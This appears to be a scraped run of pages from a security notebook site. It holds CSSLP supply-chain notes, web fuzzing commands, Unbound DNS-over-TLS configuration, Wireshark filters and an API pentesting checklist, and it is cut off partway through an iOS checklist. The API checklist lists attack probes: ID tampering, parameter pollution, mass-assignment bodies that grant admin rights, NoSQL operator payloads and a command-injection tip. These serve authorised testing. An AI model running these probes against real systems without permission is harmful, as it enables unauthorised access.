type of license. Software licenses may restrict usage based on various factors, including: * **Number of Seats:** How many systems or users can use the application * **Time:** Whether the license has a fixed or unlimited term * **Functionality:** Software may be distributed as shareware/demoware with limited functionality and a price for full functionality * **Territory:** Limit where an application can be used * **Source Code Access:** Defines the level of access to source code and how it can be used **Intellectual Property (IP)** brings value to the business and should be protected. Enhancing visibility through the supply chain to protect right of possession is essential to protecting IP. Some IP protections include: * **Copyrights:** Copyrights protect a specific work and can be used to protect an application’s source code. Copyrights restrict the unauthorized use or copying of a work even if the copyright is not formally registered. * **Patents:** Patents protect novel ideas for a specific amount of time. In the patent, the details of the invention are publicized, and the inventor gets an exclusive monopoly over it for the duration of the patent. * **Trademarks:** Trademarks protect distinct branding, such as names or logos. Protecting trademarks helps to protect brand recognition and reputation. * **Trade Secrets:** A trade secret is intellectual property that is protected as long as the owner works to keep the secret. Trade secrets are difficult to protect in software due to the potential for reverse engineering. According to the US Government General Accounting Office (GAO), the five threats to supply chain security are: * Installation of malicious logic in hardware or software * Installation of counterfeit hardware or software * Failure or disruption in the production or distribution of a critical product or service * Reliance on a malicious or unqualified service provider for the performance of a technical service * Installation of unintentional vulnerabilities in software or hardware Ensuring the authenticity and integrity of third-party code and components is essential to protecting against supply chain attacks where malicious or vulnerable functionality is inserted by an attacker with access to a vendor/supplier’s systems. Steps that organizations can take include: * **Secure Transfer:** Software should be transferred over secure channels (i.e., TLS-encrypted) and should be digitally signed to ensure authenticity and integrity. * **System Sharing/Interconnections:** Organizations often have direct connections to third-party systems, such as cloud-hosted infrastructure. Risks of these connections that should be addressed include attacks across this connection (in either direction) and loss of availability of remote systems. * **Code Repository Security:** Code repositories should be protected against unauthorized and potentially malicious modifications to code. Code should only be added after it is fully scanned, and records of commit histories should be protected against tampering. * **Build Environment Security:** With DevOps, build environments involve continuous integration, delivery, and deployment, where frequent small changes are made to code due to internal or third-party code updates. The build pipeline should be secured to ensure that it can’t be tampered with and that any issues (such as vulnerabilities) cause a failed build rather than allowing malicious or vulnerable code into production. * **Cryptographically Hashed, Digitally Signed Components:** Digital signatures ensure the authenticity and integrity of the signed data. Requiring third-party components to be digitally signed whenever possible helps to verify the correctness of this external code. * **Right to Audit:** An organization may impose requirements on third-party suppliers as part of its risk management procedures. This should include the right to audit to ensure that these requirements are being followed. * * * * **Original Equipment Manufacturer (OEM)**: OEM is when a software license is bundled with the purchase of the hardware that runs it. * **Commercial off the Shelf (COTS)**: COTS software is available for sale to the general public and includes operating systems (OSes), Microsoft Office, and similar software. * **Government off the Shelf (GOTS)**: GOTS software is developed internally by a government agency, enabling them to control all aspects of it. * **Modifiable off the Shelf (MOTS)**: MOTS software is COTS software that allows customization of the source code. * Most software contains third-party libraries and code from various sources. **Software Composition Analysis (SCA)** tools can help to build a Software Bill of Materials (SBOM) that identifies an application’s libraries and dependencies. This SBOM can then be used to see if any of this third-party code contains known vulnerabilities. [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain#supplier-security-requirements) Supplier Security Requirements ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Contracts that enforce supply chain security requirements must include the following: * Definition of the supplier’s security controls * Mechanisms for monitoring these controls * Issue resolution processes Vulnerability management in third-party components includes considerations such as: * **Notification:** Vulnerabilities in shared components may be identified by another customer and not publicly reported * **Response:** An organization may be dependent on a supplier to develop and release a patch for vulnerabilities * **Coordination:** How the organization and supplier will work together to manage the issue * **Reporting:** How any issues are reported to relevant stakeholders (management, regulators, customers, etc.) Some of the potential tradeoffs that an organization may need to consider when evaluating the security of third-party suppliers include: * **Strategic Improvements vs. Maintenance of Current Operations:** Strategic improvements can benefit a supplier's operations, but they can also create security risks, making it necessary to weigh the risks and rewards. * **High vs. Low Risk:** Managing the risk posed by a supplier can also constrain what they are able to accomplish, potentially lowering the value of the product. * **Impact of One Supplier on Another:** Each supplier in an organization’s supply chain can have impacts on other suppliers, potentially creating ripple effects down the chain. * **Opportunity Costs:** Managing suppliers and products costs money that might be better spent addressing other security risks in the future. Maintenance of third-party code may be performed under one of two models: * **Community:** Open-source code often has community maintenance and support where information is published on forums or public websites * **Commercial:** The developer of the third-party code or some organization is responsible for answering questions and fixing any issues Some considerations when evaluating an organization’s security track record include: * **Past Incidents:** How has the organization handled past security incidents? * **Audit Reports:** Are there repeated audit findings that indicate that problems don’t get fixed? * **Policies and Procedures:** What policies and procedures does the organization have in place? A product transition plan defines how components move up the supply chain and should address: * Component integrity * Component correctness and authenticity * Intellectual property and licensing Validating that technical processes are correct commonly involves the following: * Unit Testing * Integration Testing * Qualification Testing Some of the potential tradeoffs that an organization may need to consider when evaluating the security of third-party suppliers include: * **Strategic Improvements vs. Maintenance of Current Operations:** Strategic improvements can benefit a supplier's operations, but they can also create security risks, making it necessary to weigh the risks and rewards. * **High vs. Low Risk:** Managing the risk posed by a supplier can also constrain what they are able to accomplish, potentially lowering the value of the product. * **Impact of One Supplier on Another:** Each supplier in an organization’s supply chain can have impacts on other suppliers, potentially creating ripple effects down the chain. * **Opportunity Costs:** Managing suppliers and products costs money that might be better spent addressing other security risks in the future. * * * * An End User License Agreement (EULA) defines the terms under which an application can be used. For example, an EULA might prohibit commercial use or reverse engineering of an application’s logic. * Service level agreements (SLAs) define service level objectives (SLOs) that lay out the responsibilities of a service provider to a customer. * An acceptable use policy (AUP) states how employees, contractors, etc. can use corporate systems. * Developing applications in-house reduces the probability of relying on a third-party supplier compared to reusing, outsourcing, or acquiring software. * Code escrow is designed to protect customers if a supplier goes out of business or no longer provides a particular product. A copy of the source code is entrusted to the escrow agent, who can release it to the customer under certain circumstances. * Vendor technical controls ensure that the organization has visibility into the state of software artifacts in the supply chain and can verify their integrity. These are maintained via a product baseline. * Vendor integrity controls ensure that contractual requirements are passed on through prime contractors to subcontractors.\\ [PreviousDomain 7: Secure Software Deployment, Operations, Maintenance](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-7-secure-software-deployment-operations-maintenance) [NextReporting](https://martian1337.gitbook.io/notes/notes/reporting) Last updated 10 months ago * [Supply Chain Risk Management](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain#supply-chain-risk-management) * [Supplier Security Requirements](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain#supplier-security-requirements) --- # Web Fuzzing | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#what-is-web-fuzzing) What is Web Fuzzing? Web fuzzing is a technique used to discover vulnerabilities, hidden resources, and security issues in web applications by automatically injecting a large set of input data into the application and analyzing its response. The goal is to identify unexpected behaviors or errors that could indicate potential security weaknesses or misconfigurations. Fuzzing is commonly employed in security testing to find: * Hidden directories and files * Insecure APIs and endpoints * SQL injection points * Cross-site scripting (XSS) vulnerabilities * Command injection flaws * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#comparison-brute-forcing-vs.-fuzzing) Comparison: Brute-Forcing vs. Fuzzing Criteria Brute-Forcing Fuzzing Definition Systematically trying all possible combinations of input data to guess a specific value. Injecting unexpected or random data into an application to find vulnerabilities and hidden resources. Purpose Crack passwords, keys, or other access credentials. Discover application vulnerabilities, hidden files, directories, and input validation issues. Methodology Exhaustive search over all possible input combinations. Dynamic input injection to provoke unexpected application responses. Focus Specific input or data, such as passwords or API keys. General application behavior under various input conditions. Efficiency Time-consuming due to exhaustive nature; less efficient for large input spaces. More efficient in identifying unexpected behaviors and vulnerabilities with varied input. Tools Used Password crackers, key recovery tools. Web fuzzers, vulnerability scanners. Output Successful match of the correct input value. Discovery of vulnerabilities, misconfigurations, and hidden resources. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#miscellaneous-commands) Miscellaneous Commands Command Description `sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'` Add a DNS entry for a specific IP address to the `/etc/hosts` file. `for i in $(seq 1 1000); do echo $i >> ids.txt; done` Create a sequence wordlist from 1 to 1000. Useful for brute-forcing numerical IDs. `curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'` Send a POST request with specific data and headers using curl. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#commonly-used-seclists-wordlists) Commonly Used SecLists Wordlists SecLists is a collection of multiple types of wordlists used by security researchers and penetration testers. Wordlist Description `/usr/share/seclists/Discovery/Web-Content/common.txt` General-purpose wordlist for discovering directories and files. `/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt` Extensive directory-focused wordlist. `/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt` Large directory wordlist for comprehensive fuzzing. `/usr/share/seclists/Discovery/Web-Content/big.txt` Comprehensive wordlist containing both directories and files. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#tips-for-using-wordlists-effectively) Tips for Using Wordlists Effectively Tip Explanation Choose the Right Wordlist Select wordlists relevant to the target environment. Combine Wordlists Use multiple wordlists to expand coverage. Customize Wordlists Modify or create custom wordlists. Monitor Performance Large wordlists can impact performance; monitor usage. Leverage Community Resources Use up-to-date wordlists from the community. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#tools-for-web-fuzzing) Tools for Web Fuzzing #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#ffuf-fuzz-faster-u-fool) ffuf (Fuzz Faster U Fool) Command Description `ffuf -u http://example.com/FUZZ` Basic fuzzing of a URL path. `ffuf -u http://example.com/FUZZ -w wordlist.txt` Fuzz using a specific wordlist. `ffuf -u http://example.com/FUZZ -w wordlist.txt -ic` Ignore commented lines in the wordlist. `ffuf -u http://example.com/FUZZ -w wordlist.txt -mc 200` Show only results with status code 200. `ffuf -u http://example.com/FUZZ -w wordlist.txt -mr "Welcome"` Filter by regex pattern. `ffuf -u http://example.com/FUZZ -w wordlist.txt -t 50` Use 50 threads for faster fuzzing. * * * #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#gobuster) gobuster Command Description `gobuster dir -u http://example.com -w wordlist.txt` Directory fuzzing with a wordlist. `gobuster dir -u http://example.com -w wordlist.txt -x .php,.html` Add extensions to entries. `gobuster dns -d example.com -w subdomains.txt` DNS subdomain fuzzing. * * * #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#wenum-wfuzz-fork) wenum (Wfuzz Fork) Command Description `wenum -c -w wordlist.txt --hc 404 -u http://example.com/FUZZ` Exclude 404 responses during fuzzing. `wenum -c -w wordlist.txt -d 'username=FUZZ&password=secret' -u http://example.com/login` Fuzz POST parameters. `wenum -c -w wordlist.txt -t 50 -u http://example.com/FUZZ` Use 50 threads for faster fuzzing. * * * #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#feroxbuster) feroxbuster Command Description `feroxbuster -u http://example.com -w wordlist.txt` Basic URL fuzzing. `feroxbuster -u http://example.com -w wordlist.txt -e` Include file extensions. `feroxbuster -u http://example.com -w wordlist.txt -t 50` Use 50 threads. `feroxbuster -u http://example.com -w wordlist.txt --depth 3` Set recursion depth to 3. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#tips-for-effective-web-fuzzing) Tips for Effective Web Fuzzing Tip Explanation Use Comprehensive Wordlists High-quality lists improve fuzzing effectiveness. Filter Unwanted Responses Focus on meaningful HTTP codes. Adjust Thread Count Avoid server overload when increasing threads. Monitor Server Responses Watch for anomalies or errors. Fuzz with Various HTTP Methods Test GET, POST, PUT, DELETE for hidden flaws. * * * ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#web-apis-rest-soap-and-graphql) Web APIs: REST, SOAP, and GraphQL #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#what-is-a-web-api) What is a Web API? A Web API (Application Programming Interface) enables different systems to communicate over the internet. There are three main types: * REST (Representational State Transfer) * SOAP (Simple Object Access Protocol) * GraphQL * * * #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#rest) REST Feature Description Protocol HTTP/HTTPS Data Format JSON (commonly), XML Stateless Each request is independent. CRUD Operations GET, POST, PUT, DELETE Caching Supported for better performance. Advantages Simple, scalable, flexible. Disadvantages Can over-fetch or under-fetch data. **REST Fuzzing Tips** Tip Explanation Test All HTTP Methods Ensure all operations are tested. Validate Input Fields Fuzz for malformed or invalid inputs. Examine Error Messages Identify information leaks. Test Authentication Look for weak or missing auth. Explore Rate Limits Check for throttling and proper handling. * * * #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#soap) SOAP Feature Description Protocol Usually HTTP/HTTPS Data Format XML WS-Security Built-in message security Error Handling Defined SOAP fault messages Advantages Secure, reliable, extensible Disadvantages Complex and verbose **SOAP Fuzzing Tips** Tip Explanation Analyze WSDL Files Understand structure and operations. Validate XML Schema Fuzz for schema validation issues. Check for XML Injection Test for injection vulnerabilities. Test SOAP Headers Identify misconfigurations. * * * #### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#graphql) GraphQL Feature Description Protocol HTTP/HTTPS Data Format JSON Query Flexibility Clients define needed data Single Endpoint One endpoint for all queries Advantages Efficient and flexible Disadvantages Can cause performance issues if unoptimized **GraphQL Fuzzing Tips** Tip Explanation Test Query Depth Prevent infinite recursion or heavy queries. Validate Input Types Catch type and validation errors. Check Introspection Avoid schema exposure. Assess Authorization Ensure users can’t access data beyond their privileges. * * * [PreviousInformation Gathering](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering) [NextSQL Injection Fundamentals](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals) Last updated 7 months ago * [What is Web Fuzzing?](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#what-is-web-fuzzing) * [Comparison: Brute-Forcing vs. Fuzzing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#comparison-brute-forcing-vs.-fuzzing) * [Miscellaneous Commands](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#miscellaneous-commands) * [Commonly Used SecLists Wordlists](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#commonly-used-seclists-wordlists) * [Tips for Using Wordlists Effectively](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#tips-for-using-wordlists-effectively) * [Tools for Web Fuzzing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#tools-for-web-fuzzing) * [Tips for Effective Web Fuzzing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#tips-for-effective-web-fuzzing) * [Web APIs: REST, SOAP, and GraphQL](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing#web-apis-rest-soap-and-graphql) --- # Forwarding Mode Explained: Forward Queries to Upstream DNS Server (Optionally with DNS-over-TLS) | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls.md) . Forwarding sends all queries to configured upstream recursive resolvers, optionally encrypting that traffic. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#when-to-use-forwarding) When to use forwarding: * You want encrypted DNS queries between your resolver and upstream servers. * Your local recursive DNS is blocked, slow, or you want to use filtering providers. * You accept trusting a third-party provider with your DNS data. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#example-1-forward-all-queries-cleartext) Example 1: Forward All Queries (cleartext) **File path:** `/etc/unbound/unbound.conf.d/pi-hole.conf` Copy server: interface: 127.0.0.1 port: 53 forward-zone: name: "." forward-addr: 8.8.8.8 forward-addr: 8.8.4.4 ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#example-2-forward-all-queries-with-dns-over-tls-encryption) Example 2: Forward All Queries with DNS-over-TLS Encryption * Encrypt traffic to upstream servers to prevent local network/ISP snooping. * Requires specifying server hostname for TLS certificate validation. * Requires `tls-cert-bundle` to verify upstream certificates. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#example-3-split-forwarding-for-specific-zones) Example 3: Split Forwarding for Specific Zones Forward a particular internal domain to a specific DNS server (such as your local network’s domain), and forward the rest to encrypted upstream: * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#important-notes) Important Notes * The hostname after `#` in `forward-addr` is **mandatory** for correct DNS-over-TLS validation. * The `tls-cert-bundle` file must contain trusted root CA certificates to validate upstream servers. * If you run Unbound **recursively without forwarding**, no certificates or TLS configuration are needed. * Restart Unbound after modifying configuration: or for docker container: [PreviousConfiguring DoT with Unbound and Pi-hole on OPNsense](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/configuring-dot-with-unbound-and-pi-hole-on-opnsense) [NextPublic DNS Services](https://martian1337.gitbook.io/notes/digital-privacy/dns-services) Last updated 8 months ago * [When to use forwarding:](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#when-to-use-forwarding) * [Example 1: Forward All Queries (cleartext)](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#example-1-forward-all-queries-cleartext) * [Example 2: Forward All Queries with DNS-over-TLS Encryption](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#example-2-forward-all-queries-with-dns-over-tls-encryption) * [Example 3: Split Forwarding for Specific Zones](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#example-3-split-forwarding-for-specific-zones) * [Important Notes](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls#important-notes) Copy server: interface: 127.0.0.1 port: 53 forward-zone: name: "." forward-tls-upstream: yes forward-addr: 1.1.1.1@853#cloudflare-dns.com forward-addr: 9.9.9.9@853#dns.quad9.net # TLS certificate bundle location to validate upstream TLS certificates tls-cert-bundle: "/etc/ssl/certs/ca-certificates.crt" # Debian/Ubuntu # tls-cert-bundle: "/etc/pki/ca-trust/extracted/pem/tls-ca-bundle.pem" # RHEL/Fedora/CentOS Copy forward-zone: name: "example.internal" forward-addr: 192.168.1.5 forward-zone: name: "." forward-tls-upstream: yes forward-addr: 1.1.1.1@853#cloudflare-dns.com Copy sudo systemctl restart unbound Copy docker restart unbound --- # Incident Response | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/defensive-security.md) . [Splunk](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk) [Forensics](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics) [WireShark filters](https://martian1337.gitbook.io/notes/notes/defensive-security/wireshark-filters) [PreviousRed Team OPSEC Playbook](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook) [NextSplunk](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk) Last updated 1 year ago --- # Cloud Security Testing | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cloud-security-testing.md) . [https://cloud.hacktricks.xyz/welcome/readmecloud.hacktricks.xyz](https://cloud.hacktricks.xyz/welcome/readme) [PreviousPentesting JumpCloud vs Active Directory (AD) vs Azure ADDS](https://martian1337.gitbook.io/notes/notes/network-security/pentesting-jumpcloud-vs-active-directory-ad-vs-azure-adds) [NextRed Teaming](https://martian1337.gitbook.io/notes/notes/offensive-security) Last updated 1 year ago --- # Self-Hosting | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting.md) . [Proxmox VE](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve) [Secure Remote Access with TailScale + Hardened SSH](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh) [Remote Unlock of LUKS-Encrypted Root Disk via SSH](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh) [Git](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git) [Two-VPS Private Proxy Architecture: Nginx Reverse Proxy Over Wireguard VPN](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn) [PreviousAcquiring Monero (XMR) Anonymously](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously) [NextProxmox VE](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve) Last updated 10 months ago --- # WireShark filters | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/defensive-security/wireshark-filters.md) . Filter Function `ip.addr` Lists packets with IP address of specified value `ip.dst` Lists packets with destination IP address of specified value `ip.src` Lists packets with source address IP of specified value `tcp.port` Lists packets with TCP ports of specified value udp.port Lists packets with UDP ports of specified value `http.request` Filters all HTTP GET and POST requests `http.response` Shows the responses to the HTTP requests, including the response codes `dns` Sets a filter to display all packets that contain DNS data `tcp contains` Displays all TCP packets that contain a string matching whatever is defined as `ip.addr == 10.0.0.1` Show any packet with Specific IP (example 10.0.01) `tcp.port==22` how any TCP packet with Specific Port (example port 22) Class A `ip.addr == 10.0.0.0/8` Class B `ip.addr == 10.10.0.0/16` Class C `ip.addr == 10.10.10.0/24` Show packets to and from any address in a subnet `tcp.dstport == 80` Show all protocol traffic (example HTTP port 80) `tcp.port == 80 and ip.addr == 10.0.0.1` Show specific traffic to/from specific IP address (HTTP on example 10.0.0.1 ) `http.request.method == “POST”` Filter for HTTP POST Requests `http.request.method == “GET”` Filter for HTTP GET Requests `http.response.code == 200` Show specific response request (example 200) `frame contains traffic` Show all packets that contain the word ‘traffic’ [PreviousVolatility](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility) [NextGovernance, Risk, Compliance](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance) Last updated 6 months ago --- # Windows Privesc | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc.md) . [OS Attacks](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/os-attacks) [Windows User Privileges](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/windows-user-privileges) [Windows Group Privileges](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/windows-group-privileges) [Manual Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration) [Credential Theft](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/credential-theft) [PreviousLinux Privilege Escalation](https://martian1337.gitbook.io/notes/notes/network-security/linux-privilege-escalation) [NextOS Attacks](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/os-attacks) Last updated 1 year ago --- # API Testing Checklist | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/checklists/api-testing-checklist.md) . * MindAPI - [API Testing Mindmap](https://dsopas.github.io/MindAPI/play/) **Passive Reconnaissance** * Google Dorking to reveal specific information about the API * Git Dorking: `authorization: Bearer` , `filename: swagger.json` * Shodan Search: `"content-type: application/json"`, `"wp-json"` * Wayback Machine snapshots **Active Reconnaissance** * Amass: `amass enum -active -d dns.com | grep api` * `amass enum -active -brute -w /usr/share/wordlists/API_superlist -d example.com -dir [directory name]` * Testing Directories: `gobuster dir -u http://10.x.x.x -w /location/to/wordlist.txt` * `Check for API calls in Devtools > network Tab or Web App Proxy` * Import curl request to Postman **Endpoint Analysis** * Search for API documentation, if not provided, tsee if it can be discovered * Example API doc Wordlist [here](https://github.com/hAPI-hacker/Hacking-APIs/blob/main/api_docs_path) * Proxy all traffic to Postman/Burp and capture requests for history * Perform the actions that can be performed within application; this can be filtered in Postman OR * Import api doc files as new collections API Documentation Conventions Convention Example Meaning : or {} /user/:id /user/{id} /user/1337 /account/:username /account/{username} /account/mart1an The colon or curly brackets are used by some APIs to indicate a path variable. In other words, “:id” represents the variable for an ID number and “{username}” represents the account username you are trying to access. \[\] /api/v1/user?find=\[name\] Square brackets indicate that the input is optional. || “blue” || “green” || “red” Double bars represent different possible values that can be used. < > Angle Brackets represent a DomString, which is a 16-bit string * Set parameters to variable in Postman **Testing** * To change versions: `api/v3/login` → `api/v1/login` * Check other AuthN endpoints: `/api/mobile/login` → `/api/v3/login` `/api/magic_link` * Verb Tampering: `GET /api/trips/1` → `POST /api/trips/1` `POST /api/trips` `DELETE /api/trips/1` * Try Object IDs in HTTP headers and bodies, URLs tend to be less vulnerable. * Try Numeric IDs when facing a GUID/UUID: `GET /api/users/6b95d962-df38` → `GET /api/users/1` * Wrap ID with an array: `{"id":111}` → `{"id":[111]}` * Wrap ID with a JSON object: `{"id":111}` → `{"id":{"id":111}}` * HTTP Parameter Pollution: `/api/profile?user_id=legit&user_id=victim` `/api/profile?user_id=victim&user_id=legit` * JSON Parameter Pollution: `{"user_id":legit,"user_id":victim}` `{"user_id":victim,"user_id":legit}` * Wildcard instead of ID: `/api/users/1` → `/api/users/*` `/api/users/%` `/api/users/_` `/api/users/.` * Ruby application HTTP parameter containing a URL → Pipe as the first character and then a shell command. * Developer APIs differs with mobile and web APIs. Test them separately. * Change Content-Type to `application/xml` and see if the API parse it. * Non-Production environments tend to be less secure (staging/qa/etc.) Leverage this fact to bypass AuthZ, AuthN, rate limiting & input validation. * Export Injection if you see `Convert to PDF` feature. * Expand your attack surface and test old versions of [APKs](https://apkpure.com/) IPAs. Additional checks: **Mass Assignment Vulnerabilities**\\ Mass Assignment with account registration for PrivEsc: Admin Registration Blind Mass Assignment: If you suspect an API is vulnerable to Mass Assignment, there is a chance it may ignore the irrelevant variables and accept the variable that matches the expected name and format. **Check different** `**Content-Types**` If it's regular POST data try sending arrays, dictionaries If JSON is supported try to send unexpected data types If XML is supported, check for XXE [PreviousWEB APP PENTESTING CHECKLIST](https://martian1337.gitbook.io/notes/notes/appsec/checklists/web-app-pentesting-checklist) [NextAndroid Pentesting Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/android-pentesting-checklist) Last updated 1 year ago Copy POST /api/admin/create/user Token: AdminAuthToken -Redacted- { "username": "admin2", "pass": "Iforgetit0ften", "admin": true } Copy POST /create/user Token: StandardUserAuthToken -Redacted- { "username": "tester", "pass": "Test1234", "admin": true } Copy { "username":"testern", "email":"tester@site.com", "admin": true, "admin":1, "isadmin": true, "role":"admin", "role":"administrator", "user_priv": "admin", "password":"Password1!" } Copy x-www-form-urlencoded --> user=test application/json --> {"user": "test"} application/xml --> test** Copy username[]=John username[$neq]=lalala** Copy {"username": "John"} {"username": true} {"username": null} {"username": 1} {"username": [true]} {"username": ["John", true]} {"username": {"$neq": "lalala"}}** --- # IoS Pentesting Checklist | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/checklists/ios-pentesting-checklist.md) . [](https://martian1337.gitbook.io/notes/notes/appsec/checklists/ios-pentesting-checklist#apple-security-architecture) Apple Security Architecture ------------------------------------------------------------------------------------------------------------------------------------------------------ [Official Apple Security Documentation](https://support.apple.com/guide/security/welcome/web) **iOS Overview** * All applications are signed by Apple * These devices have a hardware security component * Hardware/Firmware Layer, Software Layer * Two partitions * Filesystem is Linux based * Must have a developer profile on Xcode to test apps (this allows sideloading) * Must have apple ID for testing Jailbreak Tools: Linux Jailbreak Software Checkra1n [Palera1n (newer iOS Jailbreak)](https://github.com/palera1n/palera1n) Windows version of Checkra1n - iRa1n 3utools.com - iOS device management tool Testing Tools: - OpenSSH - BurpPro mobile assistant - 